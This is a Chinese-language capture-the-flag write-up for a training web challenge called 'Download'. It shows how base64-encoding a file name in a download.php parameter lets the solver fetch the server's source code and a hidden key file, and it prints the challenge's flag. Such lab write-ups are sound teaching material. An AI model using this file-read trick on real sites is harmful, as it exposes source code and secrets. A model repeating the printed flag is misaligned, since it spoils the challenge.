南京郵電CTF平台做題writeup--web--Download~

標籤：

網址提供了兩首歌的下載連結，分別為

http://way.nuptzj.cn/web6/download.php?url=eGluZ3hpbmdkaWFuZGVuZy5tcDM=

http://way.nuptzj.cn/web6/download.php?url=YnV4aWFuZ3poYW5nZGEubXAz

可見下載檔案名稱以base64加密形式出現，於是構造download.php的base64加密ZG93bmxvYWQucGhw

訪問http://way.nuptzj.cn/web6/download.php?url=ZG93bmxvYWQucGhw下載download.php

download.php

??<?phperror_reporting(0);include("hereiskey.php");$url=base64_decode($_GET[url]);if( $url=="hereiskey.php" || $url=="buxiangzhangda.mp3" || $url=="xingxingdiandeng.mp3" || $url=="download.php"){    $file_size = filesize($url);    header ( "Pragma: public" );    header ( "Cache-Control: must-revalidate, post-check=0, pre-check=0" );    header ( "Cache-Control: private", false );    header ( "Content-Transfer-Encoding: binary" );    header ( "Content-Type:audio/mpeg MP3");    header ( "Content-Length: " . $file_size);    header ( "Content-Disposition: attachment; filename=".$url);    echo(file_get_contents($url));    exit;}else {    echo "Access Forbidden!";}?>

發現hereiskey.php同理下載hereiskey.php

?<?php//flag:nctf{download_any_file_666}?>

 

南京郵電CTF平台做題writeup--web--Download~